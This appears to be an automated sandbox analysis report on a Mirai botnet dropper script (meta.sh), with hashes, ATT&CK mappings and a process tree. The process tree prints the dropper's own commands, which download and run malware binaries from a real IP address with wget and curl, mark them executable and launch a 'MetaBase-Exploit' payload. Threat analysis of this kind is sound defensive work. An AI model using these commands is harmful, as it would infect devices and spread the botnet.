mirai | c41d5810be4537b41400f5aefb61ace955fe7f1bfc26a2bb0cd6144f38aa3679

Analysis

max time kernel
6s
max time network
9s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
17-02-2025 10:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

meta.sh
Size

483B
MD5

79b512b0b1a43d26890e67dfb400c8c8
SHA1

e8db4e2ce94cdcd5f97a02be52968a336b60d784
SHA256

c41d5810be4537b41400f5aefb61ace955fe7f1bfc26a2bb0cd6144f38aa3679
SHA512

fade5a3df3df6074e13c0a15f858e005b5ddb353729f050b74179def4dd653cee66fe53f22a484d70064ce38755d4e555fcbde9fa8a27ea70f5e1be1e5257904

Score

10^/10

mirai kurc antivm botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
677	chmod
688	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/kraapje	679	meta.sh
/tmp/kraapje	689	meta.sh

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 5 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/kre4per.x86	curl
File opened for modification	/tmp/kraapje	meta.sh
File opened for modification	/tmp/kre4per.x86_64	wget
File opened for modification	/tmp/kre4per.x86_64	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/kre4per.x86	wget

/tmp/meta.sh
/tmp/meta.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:648
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:651
- /usr/bin/wget
  wget http://194.85.251.68/bins/kre4per.x86
  2⤵
  - Writes file to tmp directory
  PID:658
- /usr/bin/curl
  curl -O http://194.85.251.68/bins/kre4per.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:666
- /bin/cat
  cat kre4per.x86
  2⤵
  PID:676
- /bin/chmod
  chmod +x busybox kraapje kre4per.x86 meta.sh systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-Fan7j3
  2⤵
  - File and Directory Permissions Modification
  PID:677
- /tmp/kraapje
  ./kraapje MetaBase-Exploit
  2⤵
  PID:679
- /usr/bin/wget
  wget http://194.85.251.68/bins/kre4per.x86_64
  2⤵
  - Writes file to tmp directory
  PID:682
- /usr/bin/curl
  curl -O http://194.85.251.68/bins/kre4per.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:685
- /bin/cat
  cat kre4per.x86_64
  2⤵
  PID:687
- /bin/chmod
  chmod +x busybox kraapje kre4per.x86 kre4per.x86_64 meta.sh systemd-private-806c12d3ba1b433dbef9e362c58cc6bf-systemd-timedated.service-Fan7j3
  2⤵
  - File and Directory Permissions Modification
  PID:688
- /tmp/kraapje
  ./kraapje MetaBase-Exploit
  2⤵
  PID:689

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/busybox

Filesize
507KB

MD5
e588bcf03ae78237b58899d35f50c570

SHA1
2194732ebbefbc27bdae876c77f2a97a20175710

SHA256
2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

SHA512
904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Download Submit
/tmp/kraapje

Filesize
61KB

MD5
d2b8f3324a01bcc7b32944d8d8b84f81

SHA1
ad898c85a87d9e44d6a88d900b23d350b545e8af

SHA256
6bc122342cb7620b9e130b71869bcedd664c243fb8a63bb2f29a9c71cb48fce4

SHA512
b8fc9a6c4a713cda10db85e1283f840de8e2a04546a20993c214a9768b8aa98172e810c148f4bf8ed90286fe9cf7b091eabf512ab0bf3681bef759ce9fa894ad

Download Submit
/tmp/kre4per.x86

Filesize
53KB

MD5
7ffbdf8a1d617b2c93d5fc520ccb31cc

SHA1
5dbe3ceeb1e58a61671b74d040b809d343d24b53

SHA256
7c3b7d80a9f95b61e3a56a62493c5f3336eabd766a17d2d07e28d01ec750f7eb

SHA512
3de46ad924e9ceab846f2a09933a1cb654e5e70c8a4bf84d395c8492470b8bcc0afc838b3f4ceb8086c81e4beba5c2884bd59a202d6c682ae58c6d2a28766727

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads